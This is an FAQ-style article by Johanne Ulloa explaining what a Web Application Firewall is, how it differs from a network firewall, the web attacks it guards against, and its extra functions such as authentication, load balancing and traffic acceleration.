Johanne Ulloa

What is a WAF ?

A WAF (Web application Firewall) is software or an application placed between the network firewall and the Web server. Its main goal is to protect against attacks such as SQL Injection, Cross Site Scripting, Code injection, Remote File Inclusion …

I already have a network firewall. Do I need a WAF ?

The network firewall is in charge of the source and the destination (Ip and port). The WAF is in charge of the content. We can compare this with a border checkpoint. First your passport will be checked (This step can be compared with the network firewall’s functionality ) then you’ll be searched (This step can be compared with the WAF’s functionality). Both actions are complementary and mandatory.

Why a WAF is now mandatory in a Web infrastructure ?

According to a Gartern’s study 75% of attacks target the application layer 2/3 of Web applications are vulnerable. Web applications have a natural sensitivity to attacks. Attacks are very easy to perform compared to network attacks and the ROI is very high for hackers. For these reasons Web attacks are very attractive for hackers. So, it is very important to put in place a WAF that will protect against Web attacks.

Easy to attack and high ROI for hackers

Web attacks, What are the targets and what are the impacts ?

• The user: Web attacks target the user in most cases to steal the user’s session cookie. As soon as a hacker gets the session cookie, the attacker will be able to perform any action on the Web Application that the user could do.
• The WEB Server: the most frequent impacts are:
  • Content modification. The impacts of modification of a site are variable depending on the sensitivity of the image of the company;
  • Adding files illicite files (pornographic content, malware …). Or adding files to conduct a phising attack;
    
  • Access to documents that are not normally accessible via the Web server;
  • Remote control of the Web server (command injection);
  • Denial of service: For example, recently with a small perl script (Slowloris) a hacker could perform an HTTP DOS.
• The application. In this case, the goal is that the Web application behaves differently than expected. For example: change the price of a product.
• The Database: These are the privileged targets for hackers. The Web server is used as a tool to access data. The impacts range from theft, deletion or alteration of data. Unfortunately many data thefts go completely unnoticed because they remain active on the server after the “intrusion“.
• Les Web Services: They are not immune from attacks. Increasingly deployed, their strong interaction with databases make them a prime target.

What other aspects of security that can be handled by the Web application firewall?

The firewall application is upstream of the Web applications it protects. It is therefore natural to ask it to perform authentication. This is particularly useful when you want to make the Web application securely available on the Internet. The Web application firewall can also virtualize the Web infrastructure. (It has the ability to use different Web server names from those used internally). In addition, a web application firewall easily makes available internal web applications on the internet. (there is no need to move the web server to a specific network zone). The WAF can also be used to provide evidence of intrusion attempts. In fact, all requests are logged (Web servers do not record all the elements, including headers and posted data).

The security of the Web application is taken into account during development, I still need a WAF?

To provide security throughout the lifecycle of the application total control is essential throughout development. Safety aspects must be taken into account from the design phase, throughout the development and operation. Often there is an insufficient level of control at these different stages to obtain the necessary level of security. These methods must therefore be complemented by the implementation of a Web application firewall to reduce the scope of vulnerability. In addition, the WAF is a remedy against attacks that target the web server itself (Vulnerabilities IIS, apache … as directory traversal, denial of services: for example Slowloris). Web Application Firewall and methods to consider the application security during the phases of development are complementary.

Does the Web Application firewall do other things apart from those related to security?

Yes, the firewall application helps accelerate web traffic especially when Web servers become overloaded. Indeed, much of the work that was done by the Web server (serve static pages, implementation of the encryption) is supported by the firewall application. The main advantage is to enable the web server to have more resources to handle dynamic pages. The Web application firewall is also able to distribute the load on several web servers and ensure high availability of these servers. The benefit is not having to implement complex high-availability and to dispense with a loadbalancer downstream.